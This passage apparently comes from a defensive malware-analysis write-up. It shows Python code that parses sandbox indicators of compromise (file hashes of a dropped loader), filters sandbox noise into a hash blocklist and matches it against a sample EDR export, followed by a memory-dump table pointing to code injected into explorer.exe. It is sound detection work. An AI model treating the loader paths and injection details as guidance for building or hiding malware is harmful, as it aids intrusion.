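SHA256: 0a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba
-
C:\Windows\Installer\e576f92.msi
Filesize: 25.2MB
MD5: be2a13cfa57db16d3f654c5e444c360b
SHA1: 7f45d2a4debbbca678cc5c300c59af01ca197bca
SHA256: b086cb6063a6fe194342b3dbe7639aebab02513305c95a914d052e87b54e0523
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs.js
Filesize: 6KB
MD5: a883224c555e18d2cc967e109707194a
SHA1: 40c8d528e098bfc028e8d7420117f808052cf94b
SHA256: 91f9cf7db91adbc89099b2d754ff304402a80dc8c4b083d82d72a5c60409a6c4
"""

FIELD = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512):\s*(\S+)$")

# Files the analysis VM produces on its own (browser profile churn, the
# PowerShell script-policy probe); they carry no signal about the sample.
NOISE = (
    re.compile(r"\\Mozilla\\Firefox\\Profiles\\", re.I),
    re.compile(r"\\__PSScriptPolicyTest_[^\\]*\.ps1$", re.I),
)


def parse_downloads(text: str) -> list[FileIoc]:
    """Each block is a path line followed by Key: value lines. Hash values
    are normalised to lowercase hex so later lookups are case-insensitive."""
    iocs = []
    for block in re.split(r"(?m)^-\s*$", text):
        path, fields = None, {}
        for line in block.strip().splitlines():
            m = FIELD.match(line.strip())
            if m:
                key, value = m.groups()
                fields[key] = value if key == "Filesize" else value.lower()
            elif path is None:
                path = line.strip()
        if path and "SHA256" in fields:
            iocs.append(FileIoc(path, fields.get("Filesize", ""), fields.get("MD5", ""),
                                fields.get("SHA1", ""), fields["SHA256"]))
    return iocs


def is_noise(path: str) -> bool:
    return any(p.search(path) for p in NOISE)


def build_blocklist(iocs) -> dict:
    """Map every md5/sha1/sha256 of a non-noise entry to its report path, so a
    hit can be matched whichever digest the telemetry source provides."""
    index = {}
    for ioc in iocs:
        if is_noise(ioc.path):
            continue
        for h in (ioc.md5, ioc.sha1, ioc.sha256):
            if h:
                index[h] = ioc.path
    return index


def digest(data: bytes) -> dict:
    """All three digests of a file's bytes, for hosts where only the file exists."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def match_hashes(index: dict, observed):
    """observed: (host, path, hexdigest) triples as an EDR export would give.
    Returns (host, path, hexdigest, report path) for each known-bad digest."""
    return [(host, path, h, index[h.lower()])
            for host, path, h in observed if h.lower() in index]


# Constructed EDR export (ASSUMED host and user): the dropped loader present
# under another profile, plus an unrelated empty file.
OBSERVED = [
    ("ws-17", r"C:\Users\j.doe\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe",
     "0A0C09753B5103E86E32C2D8086DD1399F0D97A00E1525EC9C390067CDB242BA"),
    ("ws-17", r"C:\Users\j.doe\Downloads\notes.txt", digest(b"")["sha256"]),
]

if __name__ == "__main__":
    blocklist = build_blocklist(parse_downloads(DOWNLOADS_EXCERPT))
    for hit in match_hashes(blocklist, OBSERVED):
        print(hit)
```

Sizes are kept as the report's rounded strings rather than parsed into bytes. The noise filter is the important design choice: a Firefox profile file or PowerShell's own __PSScriptPolicyTest_*.ps1 left in a blocklist produces a false positive on every workstation it is pushed to.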
Memory dumps (memory/<pid>-<index>-<start>-<end>-memory.dmp; process names from the signature tables: 1404 openwith.exe, 2300 powershell.exe, 4704 explorer.exe, 5056 steamerrorreporter64.exe):
memory/1404-317-0x0000000075710000-0x0000000075962000-memory.dmp  Filesize 2.3MB  (openwith.exe)
memory/1404-314-0x0000000002C60000-0x0000000003060000-memory.dmp  Filesize 4.0MB  (openwith.exe)
memory/1404-312-0x0000000001000000-0x0000000001009000-memory.dmp  Filesize 36KB  (openwith.exe)
memory/1404-315-0x00007FFC7B060000-0x00007FFC7B269000-memory.dmp  Filesize 2.0MB  (openwith.exe)
memory/2300-291-0x000001C1F5BC0000-0x000001C1F5BE2000-memory.dmp  Filesize 136KB  (powershell.exe)
memory/2300-307-0x000001C1F5F80000-0x000001C1F5F9C000-memory.dmp  Filesize 112KB  (powershell.exe)
memory/2300-353-0x000001C1F62A0000-0x000001C1F6462000-memory.dmp  Filesize 1.8MB  (powershell.exe)
memory/2300-354-0x000001C1F69A0000-0x000001C1F6EC8000-memory.dmp  Filesize 5.2MB  (powershell.exe)
memory/4704-306-0x0000000004E60000-0x0000000005260000-memory.dmp  Filesize 4.0MB  (explorer.exe)
memory/4704-308-0x0000000004E60000-0x0000000005260000-memory.dmp  Filesize 4.0MB  (explorer.exe)
memory/4704-309-0x00007FFC7B060000-0x00007FFC7B269000-memory.dmp  Filesize 2.0MB  (explorer.exe)
memory/4704-284-0x0000000000BC0000-0x0000000000BE8000-memory.dmp  Filesize 160KB  (explorer.exe)
memory/4704-283-0x0000000000BC0000-0x0000000000BE8000-memory.dmp  Filesize 160KB  (explorer.exe)
memory/4704-311-0x0000000075710000-0x0000000075962000-memory.dmp  Filesize 2.3MB  (explorer.exe)
memory/4704-282-0x0000000000BC0000-0x0000000000BE8000-memory.dmp  Filesize 160KB  (explorer.exe)
memory/4704-318-0x0000000000CC0000-0x0000000000CC3000-memory.dmp  Filesize 12KB  (explorer.exe)
memory/5056-267-0x00000233D2A20000-0x00000233D2A21000-memory.dmp  Filesize 4KB  (steamerrorreporter64.exe)
explorer.exe (4704) and openwith.exe (1404) each hold a 4.0MB region (0x04E60000 and 0x02C60000 respectively) and the same two mappings at 0x75710000 and 0x00007FFC7B060000; the two 4.0MB dumps are the natural first ones to examine for the injected code.